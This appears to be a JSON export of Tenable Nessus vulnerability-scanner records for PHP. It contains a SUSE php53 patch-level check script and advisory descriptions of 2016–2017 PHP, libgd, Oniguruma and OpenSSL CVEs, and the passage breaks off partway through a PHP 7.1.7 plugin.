updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 fixes the several issues. These security issues\nwere fixed :\n\n - CVE-2017-12933: The finish_nested_data function in\n ext/standard/var_unserializer.re was prone to a buffer\n over-read while unserializing untrusted data.\n Exploitation of this issue could have had an unspecified\n impact on the integrity of PHP (bsc#1054430).\n\n - CVE-2017-11628: Stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could have caused a denial of service or potentially\n allowed executing code (bsc#1050726).\n\n - CVE-2017-7890: The GIF decoding function\n gdImageCreateFromGifCtx in the GD Graphics Library did\n not zero colorMap arrays use. A specially crafted GIF\n image could use the uninitialized tables to read ~700\n bytes from the top of the stack, potentially disclosing\n sensitive information (bsc#1050241).\n\n - CVE-2016-5766: Integer overflow in the _gd2GetHeader in\n the GD Graphics Library (aka libgd) allowed remote\n attackers to cause a denial of service (heap-based\n buffer overflow and application crash) or possibly have\n unspecified other impact via crafted chunk dimensions in\n an image (bsc#986386).\n\n - CVE-2017-11145: An error in the date extension's\n timelib_meridian parsing code could have been used by\n attackers able to supply date strings to leak\n information from the interpreter, related to\n ext/date/lib/parse_date.c out-of-bounds reads affecting\n the php_parse_date function (bsc#1048112).\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could have lead to\n information leak [bsc#1048111]\n\n - CVE-2016-10397: Incorrect handling of various URI\n components in the URL parser could have been used by\n attackers to bypass hostname-specific URL checks\n (bsc#1047454).\n\n - CVE-2017-11147: The PHAR archive handler could have been\n used by attackers supplying malicious archive files to\n crash the PHP interpreter or potentially disclose\n information due to a buffer over-read in the\n phar_parse_pharfile function (bsc#1048094).\n\n - CVE-2017-11144: The openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could have lead to a crash of the PHP\n interpreter (bsc#1048096).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10168/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10397/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5766/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11144/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11145/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11628/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12933/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7890/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172522-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf3f2ab3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-php53-13282=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-php53-13282=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-php53-13282=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"apache2-mod_php53-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bcmath-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bz2-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-calendar-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ctype-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-curl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dba-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dom-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-exif-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fastcgi-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fileinfo-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ftp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gd-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gettext-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gmp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-iconv-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-intl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-json-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ldap-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mbstring-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mcrypt-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mysql-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-odbc-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-openssl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pcntl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pdo-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pear-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pgsql-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pspell-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-shmop-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-snmp-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-soap-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-suhosin-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvmsg-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvsem-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvshm-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-tokenizer-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-wddx-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlreader-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlrpc-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlwriter-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xsl-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zip-5.3.17-112.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zlib-5.3.17-112.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:17:33", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.31. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library in the compile_bracket_matchingpath() function within file pcre_jit_compile.c. An unauthenticated, remote attacker can exploit this, via a specially crafted regular expression, to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when handling overlarge POST requests. An unauthenticated, remote attacker can exploit this to exhaust available CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the php_wddx_push_element() function within file ext/wddx/wddx.c when parsing empty boolean tags. An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.y, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\nNote that the scanner has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.31 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-6004", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98822", "href": "https://www.tenable.com/plugins/was/98822", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:17:33", "description": "According to its banner, the version of PHP running on the remote web server is 7.1.x prior to 7.1.7. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-11145)\n\n - A use-after-free error exists in PHP in the zval_get_type() function within file ext/standard/var_unserializer.c. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-12934)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-12933)\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.y, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11628)\n\n - A stack-based buffer overflow condition exists in PHP in the msgfmt_parse_message() function due to improper validation of user-supplied input when parsing locale. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11362)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 7.1.x < 7.1.7 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98864", "href": "https://www.tenable.com/plugins/was/98864", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:06", "description": "According to its banner, the version of PHP running on the remote web server is 7.1.x prior to 7.1.7. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-11145)\n\n - A stack-based buffer overflow condition exists in PHP in the msgfmt_parse_message() function due to improper validation of user-supplied input when parsing locale.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11362)\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.c, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11628)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n (CVE-2017-12933)\n\n - A use-after-free error exists in PHP in the zval_get_type() function within file ext/standard/var_unserializer.c. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-12934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-07-13T00:00:00", "type": "nessus", "title": "PHP 7.1.x < 7.1.7 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_7_1_7.NASL", "href": "https://www.tenable.com/plugins/nessus/101527", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101527);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11362\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-12934\"\n );\n script_bugtraq_id(\n 99489,\n 99490,\n 99492,\n 99501,\n 100428\n );\n\n script_name(english:\"PHP 7.1.x < 7.1.7 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 7.1.x prior to 7.1.7. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n 